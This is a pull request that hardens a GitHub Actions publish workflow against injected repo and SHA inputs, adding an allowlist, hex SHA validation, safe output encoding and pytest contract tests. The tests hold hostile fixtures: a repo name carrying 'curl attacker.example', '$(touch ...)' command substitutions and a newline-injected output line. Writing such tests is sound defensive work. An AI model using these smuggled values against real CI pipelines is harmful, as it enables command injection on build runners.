### PR TITLE
Harden publish-from-core against malicious dispatch refs

### DIFF
--- a/.github/workflows/publish-from-core.yml
+++ b/.github/workflows/publish-from-core.yml
@@ -43,29 +43,64 @@ jobs:
           INPUT_DATA_REPO: ${{ github.event.inputs.data_repo }}
           INPUT_DATA_SHA: ${{ github.event.inputs.data_sha }}
           DEFAULT_DATA_REPO: ${{ vars.REGISTRY_DATA_REPO }}
+          ALLOWED_CORE_REPO: majiayu000/claude-skill-registry-core
+          ALLOWED_DATA_REPO: majiayu000/claude-skill-registry-data
         run: |
-          core_repo="${PAYLOAD_CORE_REPO:-$INPUT_CORE_REPO}"
-          core_sha="${PAYLOAD_CORE_SHA:-$INPUT_CORE_SHA}"
-          data_repo="${PAYLOAD_DATA_REPO:-$INPUT_DATA_REPO}"
-          data_sha="${PAYLOAD_DATA_SHA:-$INPUT_DATA_SHA}"
+          set -euo pipefail
 
+          core_repo="${PAYLOAD_CORE_REPO:-${INPUT_CORE_REPO:-}}"
+          core_sha="${PAYLOAD_CORE_SHA:-${INPUT_CORE_SHA:-}}"
+          data_repo="${PAYLOAD_DATA_REPO:-${INPUT_DATA_REPO:-}}"
+          data_sha="${PAYLOAD_DATA_SHA:-${INPUT_DATA_SHA:-}}"
+
+          if [ -z "$core_repo" ]; then
+            core_repo="$ALLOWED_CORE_REPO"
+          fi
           if [ -z "$data_repo" ]; then
-            data_repo="$DEFAULT_DATA_REPO"
+            data_repo="${DEFAULT_DATA_REPO:-$ALLOWED_DATA_REPO}"
           fi
 
-          if [ -z "$core_repo" ] || [ -z "$core_sha" ] || [ -z "$data_repo" ] || [ -z "$data_sha" ]; then
-            echo "Missing required publish refs."
-            echo "core_repo=$core_repo"
+          if [ -z "$core_sha" ] || [ -z "$data_sha" ]; then
+            echo "Missing required publish SHAs."
             echo "core_sha=$core_sha"
-            echo "data_repo=$data_repo"
             echo "data_sha=$data_sha"
             exit 1
           fi
 
-          echo "core_repo=$core_repo" >> "$GITHUB_OUTPUT"
-          echo "core_sha=$core_sha" >> "$GITHUB_OUTPUT"
-          echo "data_repo=$data_repo" >> "$GITHUB_OUTPUT"
-          echo "data_sha=$data_sha" >> "$GITHUB_OUTPUT"
+          if [ "$core_repo" != "$ALLOWED_CORE_REPO" ]; then
+            echo "Rejected core_repo (not allowlisted): $core_repo"
+            exit 1
+          fi
+          if [ "$data_repo" != "$ALLOWED_DATA_REPO" ]; then
+            echo "Rejected data_repo (not allowlisted): $data_repo"
+            exit 1
+          fi
+
+          if ! [[ "$core_sha" =~ ^[0-9a-f]{40}$ ]]; then
+            echo "Invalid core_sha (want 40-char lowercase hex)."
+            exit 1
+          fi
+          if ! [[ "$data_sha" =~ ^[0-9a-f]{40}$ ]]; then
+            echo "Invalid data_sha (want 40-char lowercase hex)."
+            exit 1
+          fi
+
+          append_output() {
+            local name="$1"
+            local value="$2"
+            local delim
+            delim="$(python3 -c 'import secrets; print(secrets.token_hex(16))')"
+            {
+              printf '%s<<%s\n' "$name" "$delim"
+              printf '%s\n' "$value"
+              printf '%s\n' "$delim"
+            } >> "$GITHUB_OUTPUT"
+          }
+
+          append_output core_repo "$core_repo"
+          append_output core_sha "$core_sha"
+          append_output data_repo "$data_repo"
+          append_output data_sha "$data_sha"
 
       - name: Free runner disk for large publish
         run: |
@@ -158,17 +193,32 @@ jobs:
             --main "$GITHUB_WORKSPACE"
 
       - name: Write provenance manifest
+        env:
+          CORE_REPO: ${{ steps.refs.outputs.core_repo }}
+          CORE_SHA: ${{ steps.refs.outputs.core_sha }}
+          DATA_REPO: ${{ steps.refs.outputs.data_repo }}
+          DATA_SHA: ${{ steps.refs.outputs.data_sha }}
         run: |
+          set -euo pipefail
           mkdir -p provenance
-          cat > provenance/merge-source.json <<EOF
-          {
-            "generated_at": "$(date -u +%Y-%m-%dT%H:%M:%SZ)",
-            "core_repo": "${{ steps.refs.outputs.core_repo }}",
-            "core_sha": "${{ steps.refs.outputs.core_sha }}",
-            "data_repo": "${{ steps.refs.outputs.data_repo }}",
-            "data_sha": "${{ steps.refs.outputs.data_sha }}"
+          python3 - <<'PY'
+          import json
+          import os
+          from datetime import datetime, timezone
+          from pathlib import Path
+
+          payload = {
+              "generated_at": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
+              "core_repo": os.environ["CORE_REPO"],
+              "core_sha": os.environ["CORE_SHA"],
+              "data_repo": os.environ["DATA_REPO"],
+              "data_sha": os.environ["DATA_SHA"],
           }
-          EOF
+          Path("provenance/merge-source.json").write_text(
+              json.dumps(payload, ensure_ascii=False, indent=2) + "\n",
+              encoding="utf-8",
+          )
+          PY
 
       - name: Validate final artifact API contract
         run: |

--- a/tests/test_pipeline_contracts.py
+++ b/tests/test_pipeline_contracts.py
@@ -1136,3 +1136,162 @@ def test_python_tests_workflow_runs_full_suite_with_coverage_gate():
     assert "branch = true" in pyproject
     assert "omit =" not in pyproject
     assert "exclude_also =" not in pyproject
+
+
+def publish_from_core_step(step_name: str) -> dict:
+    workflow = read_workflow(".github/workflows/publish-from-core.yml")
+    return next(
+        step for step in workflow["jobs"]["publish"]["steps"] if step["name"] == step_name
+    )
+
+
+def parse_github_output(path: Path) -> dict[str, str]:
+    text = path.read_text(encoding="utf-8")
+    outputs: dict[str, str] = {}
+    lines = text.splitlines()
+    index = 0
+    while index < len(lines):
+        line = lines[index]
+        if "<<" in line:
+            name, delim = line.split("<<", 1)
+            index += 1
+            chunks: list[str] = []
+            while index < len(lines) and lines[index] != delim:
+                chunks.append(lines[index])
+                index += 1
+            assert index < len(lines), f"unterminated multiline output for {name}"
+            outputs[name] = "\n".join(chunks)
+            index += 1
+            continue
+        if "=" in line:
+            name, value = line.split("=", 1)
+            outputs[name] = value
+        index += 1
+    return outputs
+
+
+def valid_publish_ref_env() -> dict[str, str]:
+    return {
+        "PAYLOAD_CORE_REPO": "",
+        "PAYLOAD_CORE_SHA": "",
+        "PAYLOAD_DATA_REPO": "",
+        "PAYLOAD_DATA_SHA": "",
+        "INPUT_CORE_REPO": "majiayu000/claude-skill-registry-core",
+        "INPUT_CORE_SHA": "a" * 40,
+        "INPUT_DATA_REPO": "majiayu000/claude-skill-registry-data",
+        "INPUT_DATA_SHA": "b" * 40,
+        "DEFAULT_DATA_REPO": "majiayu000/claude-skill-registry-data",
+        "ALLOWED_CORE_REPO": "majiayu000/claude-skill-registry-core",
+        "ALLOWED_DATA_REPO": "majiayu000/claude-skill-registry-data",
+    }
+
+
+def test_publish_from_core_workflow_parses_and_hardens_publish_refs():
+    workflow_text = read_repo_file(".github/workflows/publish-from-core.yml")
+    workflow = yaml.safe_load(workflow_text)
+    resolve = publish_from_core_step("Resolve publish refs")
+    provenance = publish_from_core_step("Write provenance manifest")
+
+    assert workflow["name"] == "Publish Merged Artifact (From Core)"
+    assert resolve["env"]["ALLOWED_CORE_REPO"] == "majiayu000/claude-skill-registry-core"
+    assert resolve["env"]["ALLOWED_DATA_REPO"] == "majiayu000/claude-skill-registry-data"
+    assert '^[0-9a-f]{40}$' in resolve["run"]
+    assert 'printf \'%s<<%s\\n\' "$name" "$delim"' in resolve["run"]
+    assert 'echo "core_repo=$core_repo" >> "$GITHUB_OUTPUT"' not in resolve["run"]
+    assert provenance["env"]["CORE_REPO"] == "${{ steps.refs.outputs.core_repo }}"
+    assert "python3 - <<'PY'" in provenance["run"]
+    assert "json.dumps(payload" in provenance["run"]
+    assert "cat > provenance/merge-source.json <<EOF" not in provenance["run"]
+    assert '"core_repo": "${{ steps.refs.outputs.core_repo }}"' not in provenance["run"]
+
+
+@pytest.mark.parametrize(
+    ("updates", "expected_error"),
+    [
+        (
+            {"INPUT_CORE_REPO": "evil/repo; curl attacker.example"},
+            "Rejected core_repo (not allowlisted)",
+        ),
+        (
+            {"INPUT_DATA_REPO": "majiayu000/claude-skill-registry-core"},
+            "Rejected data_repo (not allowlisted)",
+        ),
+        (
+            {"INPUT_CORE_SHA": "deadbeef"},
+            "Invalid core_sha (want 40-char lowercase hex)",
+        ),
+        (
+            {"INPUT_DATA_SHA": "A" * 40},
+            "Invalid data_sha (want 40-char lowercase hex)",
+        ),
+        (
+            {"INPUT_CORE_SHA": "a" * 39 + "g"},
+            "Invalid core_sha (want 40-char lowercase hex)",
+        ),
+        (
+            {
+                "INPUT_CORE_REPO": "majiayu000/claude-skill-registry-core\ninjected=1",
+                "INPUT_CORE_SHA": "a" * 40,
+            },
+            "Rejected core_repo (not allowlisted)",
+        ),
+        (
+            {
+                "INPUT_CORE_SHA": "a" * 40 + "; $(touch /tmp/pwned)",
+            },
+            "Invalid core_sha (want 40-char lowercase hex)",
+        ),
+    ],
+)
+def test_publish_from_core_resolve_refs_rejects_malicious_inputs(
+    tmp_path, updates, expected_error
+):
+    step = publish_from_core_step("Resolve publish refs")
+    env = valid_publish_ref_env()
+    env.update(updates)
+
+    result = run_workflow_script(step, tmp_path, env)
+
+    assert result.returncode != 0
+    assert expected_error in result.stdout + result.stderr
+
+
+def test_publish_from_core_resolve_refs_accepts_allowlisted_refs_with_safe_output(tmp_path):
+    step = publish_from_core_step("Resolve publish refs")
+    env = valid_publish_ref_env()
+
+    result = run_workflow_script(step, tmp_path, env)
+    outputs = parse_github_output(tmp_path / "github-output")
+
+    assert result.returncode == 0, result.stdout + result.stderr
+    assert outputs == {
+        "core_repo": "majiayu000/claude-skill-registry-core",
+        "core_sha": "a" * 40,
+        "data_repo": "majiayu000/claude-skill-registry-data",
+        "data_sha": "b" * 40,
+    }
+    raw = (tmp_path / "github-output").read_text(encoding="utf-8")
+    assert "core_repo<<" in raw
+    assert "core_sha<<" in raw
+
+
+def test_publish_from_core_provenance_write_is_non_interpolating(tmp_path):
+    step = publish_from_core_step("Write provenance manifest")
+    env = {
+        "CORE_REPO": "majiayu000/claude-skill-registry-core",
+        "CORE_SHA": "a" * 40,
+        "DATA_REPO": 'majiayu000/claude-skill-registry-data$(touch "$RUNNER_TEMP/pwned")',
+        "DATA_SHA": "b" * 40,
+    }
+
+    result = run_workflow_script(step, tmp_path, env)
+    provenance = json.loads((tmp_path / "provenance" / "merge-source.json").read_text())
+
+    assert result.returncode == 0, result.stdout + result.stderr
+    assert provenance["core_repo"] == env["CORE_REPO"]
+    assert provenance["core_sha"] == env["CORE_SHA"]
+    assert provenance["data_repo"] == env["DATA_REPO"]
+    assert provenance["data_sha"] == env["DATA_SHA"]
+    assert not (tmp_path / "runner-temp" / "pwned").exists()
+    assert "<<EOF" not in step["run"]
+    assert "<<'PY'" in step["run"]


### PR DESCRIPTION
## Summary
- Allowlist `core_repo`/`data_repo` to the pinned org repos and require full 40-char lowercase SHAs before any checkout or script execution.
- Encode publish refs with multiline `GITHUB_OUTPUT` delimiters and write `provenance/merge-source.json` via a quoted Python emitter so shell metacharacters cannot execute.
- Add contract tests that reject malicious repo/SHA fixtures and verify safe output/provenance behavior.

Closes #58

## Test plan
- [x] `uv run --extra dev pytest -q tests/test_pipeline_contracts.py -k publish_from_core --tb=short` (10 passed)
- [ ] Confirm workflow still parses and `Resolve publish refs` rejects untrusted repos/SHAs on a dry dispatch if desired


Made with [Cursor](https://cursor.com)